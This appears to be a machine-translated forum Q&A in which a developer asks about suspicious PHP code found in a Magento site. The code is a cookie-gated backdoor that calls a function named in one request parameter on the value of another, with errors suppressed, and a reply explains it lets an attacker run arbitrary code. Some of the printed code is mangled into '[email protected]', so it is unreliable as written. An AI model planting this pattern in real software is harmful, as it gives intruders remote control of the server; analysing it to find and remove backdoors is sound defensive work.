2
私は私が働いているMagentoのコードベースのカスタムコードのこのビットが見つかりました:
if(Mage::getSingleton('core/cookie')->get('gzipname'))
{
($_=$this->getRequest()->getParam('page'))[email protected]$_($this->getRequest()->getParam('id'));
exit;
}
誰かが何[email protected]$_(を教えてくださいすることができそして、このコードは何をすべきかを意図するのでしょうか?
ありがとうございます。 – dubloons
最初の読書では、パラメータ '' page' 'で定義されたクラスを使用していて、同じパラメータで定義されたメソッドを呼び出すようです。そのメソッドはパラメータ '' id' 'に渡されます。つまり、攻撃者が定義した攻撃者定義の方法を実行しています。基本的には$ pageを実行します。$ page($ id)$ pageと$ idはブラウザによって指定されます。エラー報告は無効になっています! –